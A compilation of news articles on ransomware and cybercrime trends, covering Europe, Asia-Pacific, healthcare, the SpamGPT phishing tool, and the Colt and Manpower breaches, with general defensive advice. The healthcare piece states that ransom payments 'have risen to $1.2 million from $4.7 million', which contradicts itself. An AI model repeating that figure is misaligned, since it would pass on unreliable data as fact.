
Europe struggles with record-breaking spike in ransomware attacks

Europe is increasingly being targeted by ransomware groups, driving attacks to unprecedented levels as criminal operations become more industrialised and sophisticated. Threat actors have established the region as a prime hunting ground and now rely on a growing ecosystem of underground marketplaces that sell everything from stolen network access and turnkey phishing kits to Malware-as-a-Service subscriptions.

New findings from CrowdStrike's 2025 European Threat Landscape Report reveal that nearly 22 per cent of all ransomware and extortion incidents recorded globally this year involved European organisations. That makes Europe the second most targeted region after North America, ahead of Asia-Pacific.

These statistics point to a troubling shift affecting Europe's public and private networks. Cybercriminals on the continent are adopting an operating model that makes attacks easier, cheaper and faster to carry out, leaving thousands of victims across Europe exposed to increasingly sophisticated and financially motivated intrusions.

CrowdStrike's latest analysis paints a clear picture of how heavily Europe has been affected by ransomware and extortion, with the continent absorbing over 22% of all such attacks worldwide. The report names the UK, Germany, France, Italy and Spain as the most frequently targeted nations. It also notes that dedicated leak site posts naming European victims have increased by nearly 13% year on year, a trend driven by groups such as Scattered Spider, which has shortened its window from initial intrusion to ransomware deployment to roughly 24 hours.

According to the study, companies in the manufacturing, professional services, technology, industrial, engineering and retail sectors remain the most heavily pursued, as prominent gangs such as Akira, LockBit, RansomHub, INC, Lynx and Sinobi continue to dominate the landscape. Big game hunting tactics aimed at high-value enterprises remain prevalent and have intensified across the continent.

The study suggests that Europe's wide and lucrative corporate base, its complex regulatory and legal structure, and the geopolitical motivations of some threat actors make the region a target for well-funded, well-resourced eCrime operations. State-aligned threat activity continues to add volatility to an already troubled cyber landscape.

In the past two years, Russian operators have intensified their operations against Ukraine, combining credential phishing with intelligence gathering and disruptive attacks on the power grid, government, military, energy, telecommunications and utility targets. North Korean actors have at the same time expanded their reach into Europe, attacking defence, diplomatic and financial institutions in operations that fuse classic espionage with cryptocurrency theft to finance the regime's strategic projects.

Moreover, Chinese state-sponsored actors have been siphoning valuable intellectual property from industries across eleven nations, exploiting cloud environments and software supply chains to expand their footprint.

A number of these operations have shown a sustained interest in biotechnology and healthcare, while Vixen Panda is now considered one of the most persistent threats to European government and defence organisations, underlining how much state-backed intrusion campaigns are adding to the region's risk.

The speed at which ransomware attacks are carried out in Europe has accelerated dramatically, with CrowdStrike noting that groups such as Scattered Spider have compressed their deployment cycles to unprecedented levels. The group has cut the time between initial intrusion and full encryption from 35.5 hours in 2024 to roughly 24 hours by mid-2025, leaving defenders fewer chances to detect or contain an intrusion.

Despite active scrutiny by law enforcement, eCrime actors based in Western countries such as the United States and the United Kingdom are building resilient criminal networks. The recent arrest by the National Crime Agency of four individuals in connection with attacks on major retailers, and the rearrest of the four individuals for involvement in a breach at Transport for London, underscore the persistence of these groups in the face of coordinated enforcement efforts.

Alongside this rapid operational tempo, a thriving underground economy has turned cybercrime into a commodity-driven industry. Russian- and English-speaking forums, together with encrypted messaging platforms, let threat actors trade tools, network access and operational support with the efficiency of commercial storefronts.

Investigators observed a total of 260 initial access brokers during the review period, advertising entry points into more than 1,400 European organisations and effectively outsourcing the initial stages of a breach. Malware-as-a-service operators, working through subscription or affiliate models, offer ready-made loaders, stealers and financial malware, further lowering the barrier to entry.

Even after major law enforcement disruptions, including the seizure of prominent forums, many operators have continued to trade without interruption, thanks to safe-haven jurisdictions and established trust networks. Beyond eCrime, the report highlights an increasingly complex threat environment shaped by state-sponsored actors from Russia, China, North Korea and Iran.

Russian actors are concentrating their efforts on Ukraine, conducting credential-phishing attacks, gathering intelligence and carrying out destructive operations against the military, government, energy, telecommunications and utility sectors, while simultaneously conducting extensive espionage across NATO member countries.

To preserve plausible deniability, groups tied to Moscow have run extensive phishing campaigns, set up hundreds of spoofed domains and even recruited "throwaway agents" through Telegram to carry out sabotage operations. Iranian groups have stepped up their hack-and-leak, phishing and DDoS activity, often masking state intent behind hacktivist personas, with their hack-and-leak campaigns extending into the UK, Germany and the Netherlands.

These converging nation-state operations have put European institutions under increased strategic pressure, adding geopolitical complexity to an already overloaded cyber-defence environment. The findings make clear that Europe urgently needs a more unified and forward-leaning security posture to navigate this escalating threat landscape. According to experts, traditional perimeter defences and slow incident response models are no longer adequate against actors operating at industrial speed.

Companies need to share regional intelligence, invest in continuous monitoring and adopt AI-driven detection capabilities to narrow the attackers' widening advantage. Keeping pace with the innovation and sophistication of criminal and state-backed adversaries is difficult for any organisation, but those that fail to modernise their defences risk being left defenceless on an increasingly unforgiving digital battlefield.

Ransomware Surge Poses Geopolitical and Economic Risks, Warns Joint Cybersecurity Report


A new joint report released this week by Northwave Cyber Security and Marsh, a division of Marsh McLennan, warns that ransomware attacks targeting small and medium-sized businesses have sharply increased, creating serious geopolitical, economic, and national security concerns. Northwave Cyber Security, a leading European cyber resilience firm, and Marsh, one of the world’s largest insurance brokers and risk advisers, analyzed thousands of cyber incidents across Europe and Israel to reveal how ransomware threats are turning into a structured global industry. 

The report finds that many ransomware operators, often linked to Russia, Iran, North Korea, and China, have intensified their attacks on small and mid-sized businesses that form the backbone of Western economies. Instead of focusing only on large corporations or government agencies, these groups are increasingly targeting vulnerable firms in sectors such as IT services, retail, logistics, and construction. 

Peter Teishev, head of the Special Risks Department at Marsh Israel, said the threat landscape has changed significantly. “As ransomware attacks become more sophisticated and decentralized, organizations must shift from responding after incidents to building proactive defense strategies,” he explained. 

He added that Israel has faced particularly high levels of cyberattacks over the past two years, making preparedness a national priority. The report estimates that global ransom payments reached nearly €700 million in 2024, with the average ransom demand standing at €172,000, which equals about 2 percent of a company’s annual revenue. 

In Europe, ransomware incidents increased by 34 percent in the first half of 2025 compared with the same period in 2024. Northwave and Marsh attribute this rapid growth to the rise of Ransomware-as-a-Service (RaaS) models, which allow criminal groups to rent out their hacking tools to others, turning ransomware into a profitable business. 

When authorities disrupt such groups, they often split and rebrand, continuing their activities under new identities. Recent attacks in Israel highlight the geopolitical aspects of ransomware. The Israel National Cyber Directorate (INCD) recently warned of a wave of intrusions against IT service providers, likely linked to Iran. 

One major incident targeted Shamir Medical Center in Tzrifin, where hackers leaked sensitive patient emails. Although an Eastern European ransomware group initially claimed responsibility, Israeli investigators later traced the attack to Iranian actors. 

Cyber experts say this collaboration between state-sponsored hackers and criminal groups shows how ransomware is now used as a tool of hybrid warfare to disrupt healthcare, energy, and transport systems for political purposes. 

The report also discusses divisions among hacker networks following Russia’s invasion of Ukraine. Some ransomware groups sided with Moscow and joined state-backed operations against NATO and EU countries. Others opposed this alignment, which led to the breakup of the infamous Conti Group. 

The exposure of more than 60,000 internal chat logs in what became known as ContiLeaks revealed the internal workings of the ransomware industry and forced several groups to reorganize under new names. Even with these internal divisions, ransomware operations have become more competitive and unpredictable. 

According to Marsh and Northwave, this has made it harder to anticipate their next moves. At the same time, cyber insurance prices fell globally by about 12 percent in the last quarter, making protection more accessible for many organizations. 

The report concludes that ransomware is no longer only a criminal enterprise but also an instrument of global power politics that can undermine economic stability and national security. As Teishev summarized, “The threat is growing, but so is the ability to prepare. The next phase of cybersecurity will focus not on recovery but on resilience.”

Growing VPN Exploits Trigger Fresh Ransomware Crisis in APAC


Amid a growing cyber risk landscape in Asia-Pacific, ransomware operations continue to tighten their grip on India and the broader region, as threat actors increasingly exploit network vulnerabilities and target critical sectors to gain a foothold.

Cyble's Monthly Threat Landscape Report for July 2025 highlights a concerning trend: cybercriminals are no longer merely encrypting systems for ransom; they are systematically extracting sensitive information, selling network access and exposing victims in underground marketplaces.

In recent weeks, India has been a focal point of this escalation, with a string of damaging breaches across key industries. The Warlock ransomware group recently released sensitive information on a domestic manufacturing company, including employee records, financial reports and internal HR files. In parallel, data stolen from two Indian companies – a technology consulting firm and a SaaS provider – was found posted on dark web forums, exposing customer information, payment credentials and server usage logs.

Compounding the threat, the report says credentials granting administrative control over an Indian telecommunications provider's infrastructure were offered for sale for an estimated US$35,000, highlighting the growing monetisation of network intrusions.

Across the region, Thailand, Japan and Singapore are the nations most targeted by ransomware, followed by India and the Philippines, with manufacturing, government and critical infrastructure the most targeted sectors. Adding to the region's digital volatility, the pro-India hacktivist group Team Pelican Hackers has claimed responsibility for hacking multiple Pakistani institutions and leaking sensitive academic and administrative data related to research projects, showing that cyber activity in the region is moving beyond financial motives to serve as a form of geopolitical signalling.

Security experts across the region are warning of renewed exploitation of SonicWall devices by threat actors linked to the Akira ransomware group, amid a growing number of ransomware incidents sweeping the region. Since Akira's activity resurged in late July 2025, Rapid7 researchers have documented a noticeable increase in intrusions using SonicWall appliances as entry points.

According to the firm, the attackers are exploiting a year-old critical vulnerability, CVE-2024-40766 (CVSS score 9.3), affecting the SSL VPN configuration on the device. The issue, which caused local user passwords to persist rather than be reset after migration, has given cybercriminals a convenient way to get past network defences.

SonicWall acknowledged the targeted activity and confirmed that malicious actors were attempting to gain unauthorised access through brute-force attacks. As immediate measures, the company advises administrators to enable Botnet Filtering to block known malicious IP addresses and to enforce strict Account Lockout policies. As ransomware campaigns exploiting VPN vulnerabilities continue to increase, proactive security hygiene is becoming ever more important.

The cybercrime challenges facing the Asia-Pacific region are compounded by recent findings from Barracuda's SOC Threat Radar Report, which indicate a significant increase in attacks exploiting vulnerabilities in VPN infrastructure and Microsoft 365 accounts. According to the study, threat actors are becoming stealthier, adopting Python-based scripts to maintain persistence within targeted networks and evade detection.

The Akira ransomware syndicate has significantly increased its operations, rapidly compromising outdated or unpatched systems and inflicting significant losses. A number of intrusions have been traced to exploitation of a known flaw in SonicWall VPN appliances, CVE-2024-40766, which allows attackers to abuse legacy credentials that were not reset after migration.

A patch addressing the issue was released a month ago. However, many organisations across the APAC region have yet to apply it, leaving them open to renewed exploitation in the coming months. In multiple instances, Akira operators have been observed intercepting one-time passwords and generating valid session tokens using previously stolen credentials, effectively bypassing multi-factor authentication even on patched networks.

The group often deploys legitimate remote monitoring and management tools to disable security software, wipe backups and obstruct remediation, allowing it to operate inside systems without being detected. Security researchers note a sustained run of such attacks in Australia and other Asian countries, showing how lapses in patch management, the use of legacy accounts and unrotated high-privilege credentials continue to amplify risk exposure.

Prompt patching, rigorous password resets and a strict credential management regime remain crucial defences against evolving ransomware threats. Manufacturing is one of the most frequently targeted industries in the Asia-Pacific region, accounting for more than 40 percent of all reported cyber incidents.

Researchers attribute this sustained attention to the sector's intricate supply chains, its dependence on outdated technologies, and the high value of the proprietary data and intellectual property held within operational networks. Attackers commonly exploit weak server configurations, steal credentials and deploy ransomware to disrupt production and extract financial gain.

Approximately 16 percent of observed attacks occurred in the financial sector and insurance industry, with adversaries infiltrating high-value systems through sophisticated phishing campaigns and malware. The purpose of these intrusions was not only to steal sensitive information, such as customer and payment information, but also to maintain persistent access for prolonged reconnaissance. 

The transportation industry, which accounts for around 11 percent of targeted companies, saw an increase in attacks intended to disrupt logistics and operational continuity, a consequence of its heavy reliance on remote connectivity and third-party digital infrastructure.

In the wider APAC context, cybercriminals are increasingly pursuing both operational and financial goals, aiming to disrupt as well as monetise. Threat actors still routinely steal trade secrets, customer records and confidential enterprise information, making data theft one of the most common outcomes of these attacks.

Credential harvesting, often carried out by information-stealing malware on compromised systems, continues to enable follow-on breaches and lateral movement within compromised environments. Extortion operations have also evolved: many adversaries now rely on non-encrypting extortion schemes rather than ransomware encryption to coerce victims, underscoring the shift in the region's threat picture.

Experts stress that there is no substitute for a multilayered, intelligence-driven approach to security in the Asia-Pacific region, one that goes beyond conventional security frameworks to defend against the rising tide of ransomware. Static defences are not sufficient in an era in which threat actors have evolved their tactics with unprecedented speed and precision.

Organisations must adopt an intelligence-based defence posture, continuously monitoring the tactics, techniques and procedures used by ransomware operators and initial access brokers to identify potential intrusions before they materialise. Because modern "sprinter" ransomware campaigns exploit vulnerabilities within hours of public disclosure, agile patch management is a critical part of this approach.

Timely identification and remediation of vulnerable systems, together with close collaboration with third-party vendors and suppliers to ensure consistent patching, are critical components of an effective cyber hygiene programme. Human factors are equally important.

Social engineering remains the most commonly exploited attack vector, so continuous awareness training tailored to employees in sensitive or high-privilege roles, such as IT and helpdesk staff, is important for reducing the potential for compromise. Security leaders also advise organisations to adopt a breach-ready mindset, accepting that even the most advanced defences may be breached.

If an attack occurs, network segmentation, immutable data backups and a rigorously tested incident response plan help contain the damage and keep operations running. By combining actionable intelligence with proactive risk management and a culture of security awareness, APAC enterprises can be better prepared to withstand, and recover from, the relentless wave of ransomware threats shaping the digital threat landscape.

The ongoing refinement of ransomware groups' tactics, as they exploit every weakness in enterprise defences, marks a defining moment for the Asia-Pacific cybersecurity landscape. The recent VPN-based attacks and data exfiltration incidents should serve as a reminder that cyber resilience is no longer just an ambition but a business imperative. Organisations are being encouraged to move away from reactive patching and adopt a culture that treats visibility, adaptability and intelligence sharing as the keys to continuous security maturity.

Collaboration between government, the private sector and the cybersecurity community can make a significant contribution to early warning systems and collective response capabilities. Measures such as more efficient threat detection, zero-trust architectures and regular penetration testing help organisations identify vulnerabilities before adversaries take advantage of them.

As digital transformation accelerates across industries, integrating security by design, from supply chains to cloud environments, is more pressing than ever. APAC organisations that treat cybersecurity as an enabler rather than a compliance exercise can not only mitigate risk but also build digital trust and operational resilience in an age of persistent and sophisticated ransomware threats.

Microsoft Warns: Over Half of Cyberattacks Driven by Extortion and Ransomware, Legacy Security Failing to Keep Up

More than 50% of cyberattacks are now motivated by extortion and ransomware, according to Microsoft’s latest Digital Defense Report. The tech giant revealed that outdated security systems are no longer capable of defending against today’s evolving cyber threats.

In its sixth annual report, Microsoft highlighted that around 80% of the cyber incidents its security teams investigated last year were financially motivated.

"That’s at least 52% of incidents fueled by financial gain, while attacks focused solely on espionage made up just 4%," said Amy Hogan-Burney, CVP for Customer Security and Trust at Microsoft.

She added, "Nation-state threats remain a serious and persistent threat, but most of the immediate attacks organizations face today come from opportunistic criminals looking to make a profit."

The report noted that critical public sectors, including hospitals and local governments, are prime targets. These institutions often handle highly sensitive information but operate with limited cybersecurity resources and response capabilities. In many cases, healthcare and other essential services are more likely to pay ransoms due to the critical nature of their operations.

Although nation-state-driven attacks account for a smaller share of total incidents, their volume is steadily increasing. Microsoft’s findings show that China continues its aggressive campaigns across industries to steal sensitive data, using covert systems and exploiting internet vulnerabilities to avoid detection.

Iran has widened its scope, targeting sectors from the Middle East to North America, including shipping and logistics companies in Europe and the Persian Gulf to gain access to valuable commercial data.

Meanwhile, Russia has extended its operations beyond Ukraine, focusing on small businesses in pro-Ukraine countries, perceiving them as softer targets compared to larger corporations.

Microsoft also identified North Korea as a major concern for both espionage and revenue-driven cyber operations. Thousands of North Korean IT workers are reportedly employed remotely by global companies, funneling their salaries back to the regime. When exposed, some of these operatives have shifted to extortion tactics.

"The cyber threats posed by nation-states are becoming more expansive and unpredictable," Hogan-Burney warned. "In addition, the shift by at least some nation-state actors to further leveraging the cybercriminal ecosystem will make attribution even more complicated."

She stressed the importance of collaboration: "This underscores the need for organizations to stay abreast of the threats to their industries and work with both industry peers and governments to confront the threats posed by nation-state actors."

Microsoft’s report also underscored how artificial intelligence and automation have empowered cybercriminals, even those with minimal expertise, to execute more complex attacks. AI tools are being used to develop malware faster, generate convincing fake content, and enhance phishing and ransomware campaigns.

More than 97% of identity attacks are now password-related, with a 32% surge in the first half of 2025 alone. Attackers commonly exploit leaked credentials and use large-scale password guessing.

"However, credential leaks aren’t the only place where attackers can obtain credentials," Hogan-Burney explained. "This year, we saw a surge in the use of infostealer malware by cyber criminals. Infostealers can secretly gather credentials and information about your online accounts, like browser session tokens, at scale."

She added, "Cyber criminals can then buy this stolen information on cyber crime forums, making it easy for anyone to access accounts for purposes such as the delivery of ransomware."

The report concludes by urging governments to establish stronger frameworks to ensure credible consequences for cyber activities that breach international laws and norms.


Cyber Risks Emerge as a Direct Threat to Clinical Care

With almost every aspect of modern medicine now supported by digital infrastructure, the healthcare sector finds itself at the epicentre of an escalating cybersecurity crisis. Cyberattacks have evolved from a financial or corporate problem into a serious clinical concern, directly putting patient safety at risk and disrupting essential healthcare.

As hospitals adopt more interconnected systems, networked diagnostic equipment and cloud-based patient records, the attack surface of medical institutions is expanding, making them increasingly susceptible to ransomware and data breaches.

The frequency and sophistication of such attacks have skyrocketed in recent years, with the number of attacks almost doubling since 2023, a year in which ransomware attacks in the United States alone climbed by a staggering 128 per cent. The consequences of these breaches go beyond data loss and financial damage.

Healthcare organisations are estimated to lose up to $900,000 per day from operational outages linked to ransomware, excluding the millions, or billions, spent on ransom payments. IBM's 2024 Cost of a Data Breach Report ranked healthcare as the industry with the highest cost per incident in the world, at an average of $9.8 million, significantly more than the $6.1 million average within the financial sector.

Yet the most devastating toll of cyberattacks is measured not in currency but in the lives of victims. Studies indicate that cyberattacks have resulted in delayed procedures, compromised care delivery and, in some cases, increased patient mortality. In 2023, 71 per cent of healthcare organisations affected by cyber incidents reported negative patient outcomes due to service disruptions, a troubling increase on the previous year.

As digital transformation continues to redefine healthcare, the line between data security and clinical safety is fast disappearing, making cybersecurity an urgent matter of patient survival rather than mere IT resilience. With cyber threats growing more sophisticated, healthcare faces an increasingly troubling convergence of digital vulnerability and human consequences.

Cybersecurity in healthcare was once viewed solely as a matter of data protection; today it is an integral part of patient safety and wellbeing. Experts predict that cyberattacks will escalate significantly by 2025, with hospitals and health systems facing mounting financial losses and growing risks.

Recent reports have described hospitals incapacitated by ransomware attacks that compromised critical care, eroded public trust and left healthcare staff unable to provide care. "Patient safety is inseparable from cyber safety," said Ryan Witt, Proofpoint's healthcare leader, noting that when digital systems fail, life-saving care can be compromised. The statistics behind these incidents reveal a frightening reality.

A study found that nearly seventy-eight per cent of healthcare organisations experienced disruptions in patient care as a result of ransomware, email compromise, cloud infiltration, and supply chain attacks. More than half of these patients experienced extended stays in the hospital or medical complications, while almost a third saw a rise in death rates. 

Financial figures often overshadow the human toll of a major attack: the average cost has fallen to $3.9 million from $4.7 million, while ransom payments have risen to $1.2 million from $4.7 million. No monetary figure, however, can fully capture the true impact of systems that go dark: missed diagnoses, delayed surgeries, and the risk to the lives that clinicians, nurses, and technicians are working to save. 

In a sector where time and precision are synonymous with survival, the encroachment of cybercrime is more than a technological nuisance: it is a profound threat to the very concept of care. The Health Information Sharing and Analysis Centre (Health-ISAC) continues to play an important role in strengthening the industry's defences amid growing global cyber threats to the healthcare sector. 

It serves as a nexus for collaboration, intelligence sharing, and real-time threat mitigation across healthcare networks worldwide. Health-ISAC is a non-profit organisation run by its members and a vital resource for safeguarding both digital and physical health infrastructure, disseminating actionable intelligence and strengthening organisational resilience. 

The organisation recently identified several security threats, including critical vulnerabilities in Citrix NetScaler ADC, NetScaler Gateway, and Cisco Adaptive Security Appliances (ASA) that could potentially be exploited. Immediately after identifying these flaws, Health-ISAC issued over a hundred targeted alerts to member institutions to minimise the risk of exploitation. 

These vulnerabilities have since been exploited by threat actors, highlighting the healthcare sector's need for continuous monitoring and rapid response mechanisms. Beyond threat detection, Health-ISAC has also been involved in regulatory alignment, particularly around the FDA's recently updated guidance on cybersecurity for medical devices. 

The revised guidance on quality system considerations and the content of premarket submissions, issued in June 2025, replaces the 2023 version and incorporates Section VII of the Federal Food, Drug, and Cosmetic Act (FD&C Act). That section sets out manufacturers' specific compliance obligations in detail, including cybersecurity assurance procedures, Software Bills of Materials (SBOMs), and secure development practices. 

Health-ISAC has also emphasised related regulatory frameworks that will affect AI-enabled medical devices, such as the FDA Quality Management System Regulation, the EU Cyber Resilience Act, and emerging standards such as AI-enabled data providers. In its latest analysis, the organisation explored how the geopolitical climate in the Asia Pacific region is shifting, where growing tensions between the Philippines and China, particularly over the Scarborough Shoal, which China has now designated a maritime wildlife refuge, are reshaping regional security. 

Australia's significant investment in asymmetric warfare capabilities is a further indication of how closely geopolitics and cybersecurity threats are intertwined. Denise Anderson, President and CEO of Health-ISAC, commented on the organisation's 15-year milestone, stating that its accomplishments demonstrate the importance of collective defence and shared responsibility. "Our growth and success are a testament to the power of collaboration and to our members' passion to improve the welfare of patients," she said.

"With the emergence of sophisticated threats, a unified defence has never been more needed." In the near future, Health-ISAC plans to strengthen its intelligence sharing capabilities, expand its partnerships around the world, and continue promoting cybersecurity awareness, all of which underline its commitment to making healthcare safer and more resilient worldwide. 

As the healthcare landscape becomes increasingly digitalised, protecting it will require not only proactive defence but a coordinated, unified approach. As technology and patient care converge, cybersecurity has become a clinical imperative, one that requires collaboration among policymakers, hospital administrators, medical device manufacturers, and cybersecurity specialists. 

Experts stress that investment in secure infrastructure, workforce training, and continuous risk monitoring and assessment is no longer optional but a necessity for maintaining patient trust and ensuring continuity of operations. 

Implementing zero-trust frameworks, applying software patches promptly, and practising transparent data governance significantly reduce vulnerabilities across complex healthcare ecosystems. Moreover, fostering global intelligence-sharing alliances such as the one promoted by Health-ISAC can strengthen collective resilience to emerging cyber threats.

With the sector facing a range of emerging challenges, from ransomware to artificial intelligence-enabled attacks, cyber safety must be treated as an integral part of patient safety if the sector is to survive. Beyond protecting data, healthcare is preserving its most vital mission: saving lives in a world where the next medical emergency could be caused by malicious code just as easily as by any other cause.

SpamGPT: AI-Powered Phishing Tool Puts Cybersecurity at Risk


While most people have heard of ChatGPT, a new threat called SpamGPT is now making headlines. Security researchers at Varonis have discovered that this professional-grade email campaign tool is designed specifically for cybercriminals. The platform, they report, offers “all the conveniences a Fortune 500 marketer might expect, but adapted for cybercrime.”

SpamGPT’s dashboard closely mimics legitimate email marketing software, allowing attackers to plan, schedule, and track large-scale spam and phishing campaigns with minimal effort. By embedding AI-powered features, the tool can craft realistic phishing emails, optimize subject lines, and fine-tune scams—making it accessible even to criminals with little technical background.

"SpamGPT is essentially a CRM for cybercriminals, automating phishing at scale, personalizing attacks with stolen data, and optimizing conversion rates much like a seasoned marketer would. It's also a chilling reminder that threat actors are embracing AI tools just as fast as defenders are," explained Rob Sobers, CMO at Varonis.

The toolkit includes built-in modules for SMTP/IMAP configuration, inbox monitoring, and deliverability testing. Attackers can upload stolen SMTP credentials, verify them through an integrated checker, and rotate multiple servers to avoid detection. IMAP monitoring further allows criminals to track replies, bounces, and email placement.

A real-time inbox check feature sends test emails and confirms whether they land in inboxes or spam folders. Combined with campaign analytics, SpamGPT functions much like a legitimate customer relationship management (CRM) platform—but is weaponized for phishing, ransomware, and other cyberattacks.

Marketed as a “spam-as-a-service” solution, SpamGPT lowers the skill barrier for cybercrime. Tutorials such as “SMTP cracking mastery” guide users in obtaining or hacking servers, while custom header options make it easier to spoof trusted brands or domains. This means even inexperienced attackers can bypass common email authentication methods and run large-scale campaigns.

Experts warn that the rise of SpamGPT could trigger a surge in phishing, ransomware, and malware attacks. Its ability to slip past spam filters and disguise malicious payloads as legitimate correspondence makes it especially dangerous for both individuals and businesses.

To counter threats like SpamGPT, cybersecurity experts recommend:

  • Enforcing DMARC, SPF, and DKIM to block spoofed emails.

  • Deploying AI-driven phishing detection tools.

  • Maintaining regular backups and malware removal protocols.

  • Implementing multi-factor authentication (MFA) across all accounts.

  • Providing ongoing phishing awareness training for employees.

  • Using network segmentation and least-privilege access controls.

  • Keeping software and security patches updated.

  • Testing and refining incident response plans for rapid recovery.

SpamGPT demonstrates how cybercriminals are harnessing AI to evolve their tactics. As defenses improve, attackers are adapting just as quickly—making vigilance and layered security strategies more critical than ever.

Colt Technology Services Confirms Customer Data Theft After Warlock Ransomware Attack

UK-based telecommunications provider Colt Technology Services has confirmed that sensitive customer-related documentation was stolen in a recent ransomware incident. The company initially disclosed on August 12 that it had suffered a cyberattack, but this marks the first confirmation that data exfiltration took place. In its updated advisory, Colt revealed that a criminal group accessed specific files from its systems that may contain customer information and subsequently posted the filenames on dark web forums. 

To assist affected clients, Colt has set up a dedicated call center where customers can request the list of exposed filenames. “We understand that this is concerning for you,” the company stated in its advisory. Notably, Colt also implemented a no-index HTML meta tag on the advisory webpage, ensuring the content would not appear in search engine results. 

The development follows claims from the Warlock ransomware gang, also known as Storm-2603, that they are auctioning one million stolen Colt documents for $200,000 on the Ramp cybercrime marketplace. The group alleges the files contain financial data, customer records, and details of network architecture. 
Cybersecurity experts verified that the Tox ID used in the forum listing matches identifiers seen in the gang’s earlier ransom notes, strengthening the link to Colt’s breach. The Warlock Group, attributed to Chinese threat actors, emerged in March 2025 and initially leveraged leaked LockBit Windows and Babuk VMware ESXi encryptors to launch attacks. Early operations used LockBit-style ransom notes modified with unique Tox IDs to manage negotiations. 

By June, the group rebranded under the name “Warlock Group,” establishing its own negotiation platforms and leak sites to facilitate extortion. Recent intelligence reports, including one from Microsoft, have indicated that the group has been exploiting vulnerabilities in Microsoft SharePoint to gain unauthorized access to corporate networks. Once inside, they deploy ransomware to encrypt data and steal sensitive files for leverage. 

The group’s ransom demands vary significantly, ranging from $450,000 to several million dollars, depending on the target organization and data involved. Colt’s disclosure highlights ongoing challenges faced by enterprises in safeguarding critical infrastructure against sophisticated ransomware actors. Telecommunications companies, which manage vast volumes of sensitive customer and network data, remain particularly attractive targets. 

As threat actors refine their tactics and increasingly combine encryption with data theft, the risks to both organizations and their clients continue to escalate. While Colt has not confirmed whether it plans to engage with the ransomware operators, the company emphasized its focus on mitigating the impact for customers. 

For now, the stolen documents remain for sale on the dark web, and the situation underscores the broader need for enterprises to strengthen resilience against the evolving ransomware landscape.

Ransom Payouts Hit Record Levels Amid Social Engineering and Data Exfiltration Attacks


Ransomware payouts surged to unprecedented levels in the second quarter of 2025, driven largely by the rise of highly targeted social engineering schemes. According to new data from Coveware by Veeam, the average ransom payment skyrocketed to $1.13 million, representing a 104% jump compared to the previous quarter. The median ransom also doubled to $400,000, highlighting how even mid-tier victims are now facing significantly higher costs. Analysts attribute this spike to larger organizations paying ransoms in incidents where data was stolen rather than encrypted, marking a significant shift in extortion tactics.  

The study found that data exfiltration has now overtaken file encryption as the primary method of extortion, with 74% of attacks involving theft of sensitive information. Multi-extortion techniques, including delayed release threats, are also on the rise. Bill Siegel, CEO of Coveware by Veeam, described the findings as a pivotal moment for ransomware, explaining that threat actors are no longer focused solely on disrupting backups or locking systems. Instead, they increasingly exploit people, organizational processes, and the reputational value of stolen data. 

The report identified the leading ransomware variants for the quarter as Akira, responsible for 19% of incidents, followed by Qilin at 13% and Lone Wolf at 9%. Notably, Silent Ransom and Shiny Hunters entered the top five variants for the first time, reflecting the growing influence of newer threat groups. Among the most concerning trends was the heavy reliance on social engineering by groups such as Scattered Spider, Silent Ransom, and Shiny Hunters, who have shifted from broad, opportunistic attacks to precise impersonation schemes. By targeting help desks, employees, and third-party service providers, these actors have refined their ability to gain initial access and execute more lucrative attacks.  

Exploitation of known vulnerabilities in widely used platforms including Ivanti, Fortinet, VMware, and Microsoft services remains a common entry point, often taking place immediately after public disclosure of security flaws. At the same time, “lone wolf” cybercriminals armed with generic, unbranded ransomware toolkits are increasing in number, allowing less sophisticated actors to successfully infiltrate enterprise systems. Insider risks and third-party vulnerabilities also rose during the quarter, particularly through business process outsourcing firms, contractors, and IT service providers. Researchers warned that these external partners often hold privileged credentials but lack direct oversight, making them an attractive avenue for attackers. 

The professional services sector was hit hardest, accounting for 20% of all incidents, followed closely by healthcare and consumer services at 14% each. Mid-sized companies with between 11 and 1,000 employees represented 64% of victims, a range that attackers consider optimal for balancing ransom potential against weaker defenses. Before executing data theft or encryption, many attackers are spending additional time mapping networks, identifying high-value assets, and cataloging sensitive systems. This reconnaissance phase often blends in with normal administrative activity, using built-in system commands that are difficult to detect without contextual monitoring. Experts note, however, that detection can be improved by monitoring unusual enumeration activity or deploying deception techniques such as honeyfiles, decoy credentials, or fake infrastructure to trigger early alerts. 

Siegel emphasized that organizations must now treat data exfiltration as an immediate and critical risk rather than a secondary concern. Strengthening identity controls, monitoring privileged accounts, and improving employee awareness against social engineering were highlighted as essential steps to counter evolving ransomware tactics. With attackers increasingly blending technical exploits and psychological manipulation, businesses face mounting pressure to adapt their defenses or risk becoming the next high-value target.

Manpower Data Breach Hits 145,000 After RansomHub Ransomware Attack


Manpower, one of the world’s largest staffing and recruitment companies, has confirmed that nearly 145,000 individuals had their personal data compromised following a ransomware attack in late December 2024. The company, which operates as part of ManpowerGroup alongside Experis and Talent Solutions, employs more than 600,000 workers across 2,700 offices worldwide and reported $17.9 billion in revenues last year. 

The breach came to light after the company investigated a systems outage at a Lansing, Michigan, franchise in January 2025. According to a filing with the Office of the Maine Attorney General, attackers gained unauthorized access to Manpower’s network between December 29, 2024, and January 12, 2025. In notification letters sent to affected individuals, Manpower revealed that certain files may have been accessed or stolen during this time. The company stated that the breach potentially exposed personal information, though the full scope of data compromised remains undisclosed. 

On July 28, 2025, the staffing firm formally notified 144,189 individuals that their data may have been involved in the incident. Following the discovery, Manpower announced that it had implemented stronger IT security measures and is cooperating with the FBI to pursue those responsible. To mitigate the impact on victims, the company is also offering complimentary credit monitoring and identity theft protection services through Equifax. 

The ransomware group RansomHub has claimed responsibility for the attack. In January, shortly after Manpower disclosed the incident, the group alleged that it had stolen 500GB of sensitive files from the company’s systems. According to RansomHub, the stolen trove included personal and corporate records such as passports, Social Security numbers, contact details, financial documents, HR analytics, and confidential contracts. The gang initially published details of the breach on its dark web site but later removed Manpower’s listing, raising speculation that a ransom may have been paid to prevent further data leaks. 

RansomHub is a ransomware-as-a-service (RaaS) operation that emerged in early 2024, evolving from earlier groups known as Cyclops and Knight. Since then, it has been linked to numerous high-profile attacks against global organizations, including Halliburton, Kawasaki’s European operations, Christie’s auction house, Frontier Communications, Planned Parenthood, and the Bologna Football Club. The group was also behind the leak of data stolen in the massive Change Healthcare cyberattack, one of the largest breaches in the U.S. healthcare sector, impacting more than 190 million individuals. 

Last year, the FBI reported that RansomHub affiliates had breached over 200 critical infrastructure organizations across the United States, further underlining the group’s reach and persistence. While ManpowerGroup has not confirmed the exact nature of the stolen data or whether negotiations occurred, a company spokesperson clarified that the incident was confined to an independently operated franchise in Lansing. The spokesperson emphasized that the franchise runs on a separate platform, meaning no ManpowerGroup corporate systems were compromised.

